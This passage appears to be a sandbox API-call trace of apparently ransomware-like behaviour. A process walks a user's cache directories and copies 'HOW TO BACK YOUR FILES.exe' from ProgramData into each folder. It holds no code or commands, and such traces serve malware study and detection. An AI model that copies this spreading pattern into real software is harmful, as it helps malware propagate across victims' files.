Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4a3fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.497] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.497] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.497] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0104.497] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0104.497] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.497] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\virtualized\\c\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.498] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.498] GetLastError () returned 0x0 [0104.498] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.498] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4a3fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.498] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.498] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.498] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" [0104.499] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" [0104.499] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.499] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\virtualized\\c\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.499] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.500] GetLastError () returned 0x0 [0104.500] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.500] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4ca120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4ca120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.500] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.500] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.500] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low" [0104.500] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low" [0104.500] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.500] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.501] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.501] GetLastError () returned 0x0 [0104.501] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.502] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x69e1e3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69e1e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.502] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.502] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.502] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5" [0104.502] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5" [0104.502] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.502] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\low\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.503] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.503] GetLastError () returned 0x0 [0104.503] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.503] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x69e1e3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69e1e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.503] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.503] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.504] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8" [0104.504] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8" [0104.504] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.504] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\low\\content.ie5\\yg1r61z8\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.504] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.505] GetLastError () returned 0x0 [0104.505] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.505] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3c5820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6a3c5820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.505] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.505] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.506] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR" [0104.506] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR" [0104.506] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.506] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\low\\content.ie5\\ikqeepzr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.507] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.507] GetLastError () returned 0x0 [0104.507] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.507] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a8d46e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6a8d46e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.507] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.507] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.508] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY" [0104.508] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY" [0104.508] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.508] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\low\\content.ie5\\abv8l7my\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.509] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.509] GetLastError () returned 0x0 [0104.509] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.509] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6ae7bb20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ae7bb20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.509] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.509] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.510] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ" [0104.510] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ" [0104.510] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.510] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.511] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.511] GetLastError () returned 0x0 [0104.511] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.511] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b5c5e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b5c5e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.511] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.511] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.512] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\AntiPhishing", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\AntiPhishing") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\AntiPhishing" [0104.512] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\AntiPhishing" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\AntiPhishing") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\AntiPhishing" [0104.512] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.512] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\AntiPhishing\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\low\\antiphishing\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.513] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.513] GetLastError () returned 0x0 [0104.513] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.513] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\AntiPhishing\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f10630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b5c5e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b5c5e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, 